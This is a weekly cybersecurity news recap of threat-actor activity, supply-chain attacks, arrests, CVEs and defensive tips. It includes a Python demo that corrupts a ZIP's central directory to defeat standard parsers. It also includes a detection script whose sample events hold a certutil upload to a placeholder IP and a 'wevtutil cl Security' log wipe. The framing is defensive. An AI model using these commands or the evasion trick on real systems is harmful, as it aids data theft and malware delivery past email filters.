This week's cyber world is like a big spy movie. Hackers are breaking into other hackers' setups, sneaky malware is hiding in popular software, and AI-powered scams are tricking even the smartest of us. On the other side, the good guys are busting secret online markets and shutting down criminal chat services, while big companies rush to fix new security holes before attackers can jump in.
Want to know who's hacking whom, how they're doing it, and what's being done to fight back? Stick around; this recap has the scoop.
⚡ Threat of the Week
Turla Hackers Hijack Pakistan Hackers' Infrastructure — Imagine one hacker group sneaking into another hacker group's secret hideout and using their stuff to carry out their own missions. That's basically what the Russia-linked Turla group has been doing since December 2022. They broke into the servers of a Pakistani hacking team called Storm-0156 and used those servers to spy on government and military targets in Afghanistan and India. By doing this, Turla not only got easy access to important information but also made it way harder for anyone to figure out who was actually running the show. This is a classic move for Turla—they often hijack other hackers' operations to hide their tracks and make it super confusing to tell who's really behind these attacks.
🔔 Top News
- Ultralytics and @solana/web3.js Libraries Targeted by Supply Chain Attacks — In two separate incidents, unknown threat actors managed to push malicious versions of the popular Ultralytics library for Python and @solana/web3.js package for npm that contained code to drop a cryptocurrency miner and a drainer, respectively. The maintainers have since released updated versions to address the issue.
- New Android Malware DroidBot Targets Over 70 Financial Institutions — Dozens of banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot. The malware is capable of gathering a wide range of information from compromised devices. A majority of the campaigns distributing the malware have targeted users in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom. DroidBot has been observed operating under a malware-as-a-service (MaaS) model for a monthly fee of $3,000.
- A Busy Week of Law Enforcement Actions — Europol last week announced the disruption of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale by acting as a hub for stolen financial information. A 27-year-old and a 37-year-old have been arrested in Germany and Austria, respectively, in connection with the operation. They are currently in pretrial detention. Separately, the law enforcement agency said it also dismantled an invite-only encrypted messaging service called MATRIX that was created by criminals for criminal purposes, including drug trafficking, arms trafficking, and money laundering.
- Tibetans and Uyghurs Become the Target of Earth Minotaur — A newly christened threat activity cluster dubbed Earth Minotaur has been found leveraging the MOONSHINE exploit kit to deliver a new backdoor called DarkNimbus as part of long-term surveillance operations targeting Tibetans and Uyghurs. In the attack chains documented by Trend Micro, the attackers leveraged WeChat as a conduit to deploy the backdoor. The use of MOONSHINE has been previously linked to other groups like POISON CARP and UNC5221, suggesting some kind of tool sharing.
- Salt Typhoon Guidance Issued — Australia, Canada, New Zealand, and the U.S. issued joint guidance for organizations to safeguard their networks against threats posed by Salt Typhoon, which has recently been linked to a spate of cyber attacks directed against telecommunication companies in the U.S., including AT&T, T-Mobile, and Verizon. As many as eight U.S. telecom companies, along with organizations in dozens of other countries, are estimated to have been affected by the campaign.
- Malware Campaign Leverages Corrupt Word and ZIP Files — New phishing campaigns ongoing since at least August 2024 have been taking advantage of corrupted Microsoft Office documents and ZIP archives as a way to bypass email defenses. "By manipulating specific components like the CDFH and EOCD, attackers can create corrupted files that are successfully repaired by applications but remain undetected by security software," ANY.RUN said. The CDFH (central directory file header) records and the EOCD (end of central directory) record form the index at the end of a ZIP that standard parsers use to enumerate entries; Word's .docx format is itself a ZIP container, which is why the same trick works on both file types.
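The trick ANY.RUN describes relies on the gap between how a ZIP's index and its entries are read. Each file sits behind its own local file header, while the central directory (the CDFH records) and the EOCD record at the end of the archive are only a lookup table pointing at those headers. A spec-following scanner finds entries through the EOCD and central directory and gives up when they are damaged; a "repair" routine ignores the index, walks the local headers, and gets the payload back. The Python below is an added example, not ANY.RUN's code or a sample from the campaign: it builds a small constructed archive (file names and content are made up), zeroes the EOCD and first CDFH signatures, shows that the standard library refuses the result, and then carves the entries out the way a repairing application does.

```python
import io
import struct
import zipfile
import zlib

LOCAL_HDR_SIG = b"PK\x03\x04"   # local file header, one per entry, precedes that entry's data
EOCD_SIG = b"PK\x05\x06"        # end of central directory record, at the end of the file

# Constructed sample: a minimal .docx-like payload (a .docx is just a ZIP container).
SAMPLE_FILES = {
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document>Click to view invoice</w:document>" * 8,
}


def build_zip(files):
    """Write a well-formed ZIP to memory from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def corrupt_central_directory(blob):
    """Zero the EOCD signature and the first CDFH signature. Every local file
    header, and therefore every payload, is left untouched."""
    eocd = blob.rfind(EOCD_SIG)
    cd_offset = struct.unpack("<I", blob[eocd + 16:eocd + 20])[0]  # EOCD field: CD start offset
    b = bytearray(blob)
    b[cd_offset:cd_offset + 4] = b"\x00\x00\x00\x00"  # "PK\x01\x02" of the first CDFH
    b[eocd:eocd + 4] = b"\x00\x00\x00\x00"            # "PK\x05\x06"
    return bytes(b)


def stdlib_can_open(blob):
    """A spec-following parser (here Python's zipfile) locates entries via EOCD and CDFH."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            zf.namelist()
        return True
    except zipfile.BadZipFile:
        return False


def carve_local_entries(blob):
    """Recover entries by walking local file headers and ignoring the central directory.
    Returns {name: (data, crc_ok)}; crc_ok is None when the header carries no CRC
    (data-descriptor flag set, so the CRC lives after the data instead)."""
    entries, pos = {}, 0
    while True:
        pos = blob.find(LOCAL_HDR_SIG, pos)
        if pos == -1 or pos + 30 > len(blob):
            break
        # fixed 26 bytes after the signature: version, flags, method, mtime, mdate,
        # crc32, compressed size, uncompressed size, name length, extra length
        (_ver, flags, method, _mt, _md, crc, csize, _usize,
         nlen, xlen) = struct.unpack("<HHHHHIIIHH", blob[pos + 4:pos + 30])
        name = blob[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        start = pos + 30 + nlen + xlen
        if method == 0:                          # stored
            data, consumed = blob[start:start + csize], csize
        elif method == 8:                        # deflate: zlib finds the end of stream itself
            d = zlib.decompressobj(-15)
            data = d.decompress(blob[start:])
            consumed = len(blob) - start - len(d.unused_data)
        else:                                    # unsupported method: skip past the header
            pos = start
            continue
        crc_ok = None if flags & 0x08 else (zlib.crc32(data) & 0xFFFFFFFF) == crc
        entries[name] = (data, crc_ok)
        pos = start + consumed
    return entries


if __name__ == "__main__":
    good = build_zip(SAMPLE_FILES)
    bad = corrupt_central_directory(good)
    print("stdlib opens intact file:", stdlib_can_open(good))
    print("stdlib opens corrupted file:", stdlib_can_open(bad))
    for name, (data, ok) in carve_local_entries(bad).items():
        print(f"carved {name}: {len(data)} bytes, crc_ok={ok}")
```

The defensive takeaway is that an inspection pipeline should carve local file headers itself rather than trust a library that fails closed on a bad central directory; a file the standard parser rejects but that still carves cleanly deserves a closer look, not an automatic pass.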
🔥 Trending CVEs
Heads up! Some popular software has serious security flaws, so make sure to update now to stay safe. The list includes — CVE-2024-41713 (Mitel MiCollab), CVE-2024-51378 (CyberPanel), CVE-2023-45727 (Proself), CVE-2024-11680 (ProjectSend), CVE-2024-11667 (Zyxel), CVE-2024-42448 (Veeam), CVE-2024-10905 (SailPoint IdentityIQ), CVE-2024-5921 (Palo Alto Networks GlobalProtect), CVE-2024-29014 (SonicWall), CVE-2014-2120 (Cisco Adaptive Security Appliance), CVE-2024-20397 (Cisco NX-OS), CVE-2024-52338 (Apache Arrow), CVE-2024-52316 (Apache Tomcat), CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-12053 (Google Chrome), CVE-2024-38193 (Microsoft Windows), and CVE-2024-12209 (WP Umbrella: Update Backup Restore & Monitoring plugin).
📰 Around the Cyber World
- Researchers Debut New VaktBLE Framework — A group of academics from the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design has unveiled a novel jamming technique called VaktBLE that can be used to defend against low-level Bluetooth Low Energy (BLE) attacks. "VaktBLE presents a novel, efficient, and (almost) deterministic technique to silently hijack the connection between a potentially malicious BLE central and the target peripheral to be protected," the researchers explained. "This creates a benevolent man-in-the-middle (MiTM) bridge that allows us to validate each packet sent by the BLE central."
- FBI Warns of AI-Enabled Financial Fraud — The U.S. Federal Bureau of Investigation (FBI) is warning that cybercriminals are exploiting generative artificial intelligence (AI) to generate synthetic content and commit fraud at scale. This comprises the use of AI tools to produce realistic images, audio, and video clips of people, celebrities, and topical events; generate fraudulent identification documents; create fictitious social media profiles; craft convincing messages; assist with language translation; generate content for counterfeit websites; and even embed chatbots that aim to trick victims into clicking on malicious links. "Criminals use AI-generated text to appear believable to a reader in furtherance of social engineering, spear-phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to overcome common indicators of fraud schemes," the FBI said.
- Lateral Movement Techniques on macOS — Cybersecurity researchers have highlighted the different ways threat actors are abusing SSH, Apple Remote Desktop, and Remote Apple Events (RAE) to facilitate lateral movement on Apple macOS systems. "Lateral movement refers to the techniques cyber attackers use to navigate through a network after compromising an initial system," Palo Alto Networks Unit 42 said. "This phase is crucial for attackers to achieve their ultimate objectives, which might include data exfiltration, persistence or further system compromise." The disclosure comes as new research has revealed how the legitimate Windows Event Logs utility wevtutil.exe could be abused to carry out malicious activities and slip past security controls unnoticed, a technique known as living-off-the-land. "Using wevtutil.exe as part of a chain of LOLBAS utilities can further obfuscate actions," Denwp Research's Tonmoy Jitu said. "For instance, an attacker could export logs using wevtutil.exe, compress the exported file with makecab.exe, [and] use certutil.exe to upload the file to a remote location."
- Another Scattered Spider Hacker Arrested in the U.S. — U.S. authorities have arrested a 19-year-old named Remington Goy Ogletree (aka remi) for his role in the Scattered Spider cybercrime syndicate and breaching a U.S. financial institution and two unnamed telecommunications firms. "From at least October 2023 through at least May 2024, Ogletree perpetuated a scheme to defraud in which he called and sent phishing messages to U.S.- and foreign-based company employees to gain unauthorized access to the companies' computer networks," per a complaint filed in late October 2024. "Once Ogletree had access to the victim companies' networks, Ogletree accessed and stole confidential data, including data that was later posted for sale on the dark web, and, at times, used the companies' services to facilitate the theft of cryptocurrency from unwitting victims. As a result of Ogletree's scheme, victims have suffered over $4 million in losses." The charges come weeks after the U.S. government indicted five other members of the infamous hacking crew. Scattered Spider is believed to be part of a broader loose-knit cybercrime group called The Com. According to a new report published by CyberScoop, The Com and a child sextortion sub-cluster known as 764 are engaging in financially motivated cybercrime tactics such as SIM swapping, IP grabbing, ATM skimming, and social engineering to commit violent crimes.
- FTC Takes Action Against 2 Data Brokers — The U.S. Federal Trade Commission (FTC) has banned Virginia-based Gravy Analytics and its subsidiary Venntel from tracking and selling sensitive location data from users, including selling data about consumers' visits to health-related locations and places of worship, without their consent. The companies have also been ordered to establish a sensitive location data program. It's alleged that the two companies "obtained consumer location information from other data suppliers and claimed to collect, process, and curate more than 17 billion signals from around a billion mobile devices daily." The data was gathered from ordinary mobile apps, and then sold to other businesses or government agencies. Venntel's data is reportedly used by controversial surveillance company Babel Street to power its product Locate X, which can be used to precisely monitor a user's whereabouts without a warrant. The FTC also accused Mobilewalla, a Georgia-based data broker, of purposefully tracking users by collecting massive amounts of sensitive consumer data, like visits to health clinics and places of worship, from real-time bidding exchanges and third-party aggregators. "Mobilewalla exploited vulnerabilities in digital ad markets to harvest this data at a stunning scale," the FTC said. In a related move, the Consumer Financial Protection Bureau (CFPB) proposed new rules to curb the sale of sensitive personal and financial information, such as Social Security numbers and banking details, to other parties without a legitimate reason. The development also comes as the FTC announced an enforcement action against facial recognition firm IntelliVision Technologies for deceptively marketing its software as being accurate and claiming that it "performs with zero gender or racial bias" without providing any evidence to back up its claims.
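The wevtutil.exe, makecab.exe and certutil.exe chain quoted from Denwp Research in the macOS lateral movement item above is a good candidate for a sequence detection, because each utility is legitimate on its own but the three in order, run by the same user on the same host within a few minutes, are not. The Python below is an added example, not Unit 42's or Denwp Research's code: it runs over a handful of constructed process-creation events (Sysmon event 1 or Windows 4688 style; host names, users, paths and the 203.0.113.5 address are all made up), raises one alert for the export, compress, transfer chain and a separate one for wevtutil clearing a log, and stays quiet on a benign log query and file hash check from another host.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

CHAIN_WINDOW = timedelta(minutes=10)

# The chain described by Denwp Research, as ordered stages. Each stage is
# (name, image basename, predicate over the space-padded, lower-cased command line).
STAGES = [
    ("export_log", "wevtutil.exe", lambda c: " epl " in c or " export-log " in c),
    ("compress",   "makecab.exe",  lambda c: True),
    ("transfer",   "certutil.exe", lambda c: "-urlcache" in c and "http" in c),
]

# Constructed sample process-creation events (Sysmon event 1 / Windows 4688 style).
# Hosts, users, paths and the 203.0.113.5 address are invented for this example.
SAMPLE_EVENTS = [
    {"ts": "2024-12-06T10:01:02Z", "host": "WS01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmd": r"wevtutil.exe epl Security C:\Users\Public\sec.evtx"},
    {"ts": "2024-12-06T10:01:40Z", "host": "WS01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\makecab.exe",
     "cmd": r"makecab.exe C:\Users\Public\sec.evtx C:\Users\Public\sec.cab"},
    {"ts": "2024-12-06T10:02:15Z", "host": "WS01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://203.0.113.5/up C:\Users\Public\sec.cab"},
    {"ts": "2024-12-06T10:05:00Z", "host": "WS01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmd": "wevtutil.exe cl Security"},
    # Benign admin activity on another host: a log query and a file hash, no chain.
    {"ts": "2024-12-06T10:03:00Z", "host": "WS02", "user": r"CORP\bob",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmd": "wevtutil.exe qe Security /c:5 /f:text"},
    {"ts": "2024-12-06T10:03:30Z", "host": "WS02", "user": r"CORP\bob",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -hashfile C:\Tools\agent.msi SHA256"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def norm_cmd(event):
    return " " + event["cmd"].lower() + " "


def image_name(event):
    return PureWindowsPath(event["image"]).name.lower()


def stage_of(event):
    """Name of the chain stage this event satisfies, or None."""
    image, cmd = image_name(event), norm_cmd(event)
    for name, exe, pred in STAGES:
        if image == exe and pred(cmd):
            return name
    return None


def is_clear_log(event):
    """wevtutil cl / clear-log is anti-forensics and worth an alert on its own."""
    cmd = norm_cmd(event)
    return image_name(event) == "wevtutil.exe" and (" cl " in cmd or " clear-log " in cmd)


def find_chain(events):
    """Return the command lines of an export -> compress -> transfer sequence
    completed within CHAIN_WINDOW by one actor, or None. Events must be time-sorted."""
    idx, start, chain = 0, None, []
    for e in events:
        stage = stage_of(e)
        if stage is None:
            continue
        ts = parse_ts(e["ts"])
        if start is not None and ts - start > CHAIN_WINDOW:
            idx, start, chain = 0, None, []          # window expired: start over
        if stage == STAGES[idx][0]:
            if idx == 0:
                start = ts
            chain.append(e["cmd"])
            idx += 1
            if idx == len(STAGES):
                return chain
    return None


def detect(events):
    """Group events by (host, user), then emit chain and clear-log alerts."""
    by_actor = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_actor[(e["host"], e["user"])].append(e)
    alerts = []
    for (host, user), evs in by_actor.items():
        chain = find_chain(evs)
        if chain:
            alerts.append({"rule": "lolbas_log_exfil_chain", "host": host,
                           "user": user, "evidence": chain})
        for e in evs:
            if is_clear_log(e):
                alerts.append({"rule": "event_log_cleared", "host": host,
                               "user": user, "evidence": [e["cmd"]]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["rule"], a["host"], a["user"], *a["evidence"], sep="\n  ")
```

The window, the stage predicates and the requirement that all three stages come from the same user on the same host are the knobs to tune. In a real pipeline the events would come from the SIEM rather than an inline list, and parent-process fields are worth adding so that a chain launched from an Office process or a scripting host scores higher than one typed at an admin's console.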
🎥 Expert Webinar
- Learn How Experts Secure Privileged Accounts — In this expert-led webinar, learn proven techniques for managing privileged access and stopping cyber threats before they escalate. We'll show you how to discover hidden accounts, gain full visibility into user activities, enforce least privilege policies, and create a stronger security posture that protects your organization's critical assets.
- Understanding Blind Spots in Advanced Security Systems — Discover why even well-prepared companies still experience breaches, and learn how to strengthen your defenses in this webinar with Silverfort's CISO, John Paul Cunningham. Explore common vulnerabilities, modern threats, tactics to spot hidden risks, and strategies to align security efforts with business goals. Gain actionable insights to protect your organization.
🔧 Cybersecurity Tools
- Vanir Security Patch Validation Tool — Vanir is an open-source tool from Google that helps developers quickly find and fix missing security patches in their Android code. Instead of relying on version numbers or build info, Vanir compares source code to known vulnerabilities, ensuring better accuracy and coverage. By connecting with the Open Source Vulnerabilities database, Vanir always stays up-to-date. With a 97% accuracy rate, it reduces manual work, speeds up patch adoption, and helps ensure that devices receive critical security updates more quickly.
- garak LLM Vulnerability Scanner — garak is a free tool that scans large language models (LLMs) for weaknesses. Think of it like nmap, but for LLMs. It tries to break models by testing them with many different probes, looking for failures like hallucinations, data leaks, misinformation, or prompt injections. Each time it finds a flaw, garak logs the exact prompt, response, and reason, so you know what to fix. With dozens of plugins and thousands of tests, garak adapts over time as the community adds new, tougher challenges.
🔒 Tip of the Week
Turn Your PC into a Malware 'No-Go' Zone — Malware often avoids running if it suspects it's in a research lab or test environment. By placing fake clues—like virtual machine-related registry keys, empty folders named after analysis tools, or dummy drivers—on your PC, you can trick malware into thinking it's being watched. Tools like Malcrow (open-source) and Scarecrow (free) create fake indicators—virtual machine keys, dummy processes, or tool-like entries—to fool it into retreating. This might make certain threats back off before causing harm. Although this trick isn't perfect, it can add a subtle extra layer of security, alongside your antivirus and other defenses. Just remember to test changes carefully and keep things believable. It won't stop every attacker, but it might deter less sophisticated malware from targeting your system.
Conclusion
As you think about this week's threats, consider some less common tactics. For example, plant fake "decoy" files on your network; if someone opens them, you'll know there's a problem. Keep an inventory of every dependency you ship (a software bill of materials), so that a tampered or unexpected package, like the Ultralytics and @solana/web3.js releases above, stands out right away. Also, control which systems can talk to which on your network, so that an attacker who lands on one machine finds it harder to move to the next. These simple steps can help you stay one step ahead in a world where cyber risks are always changing.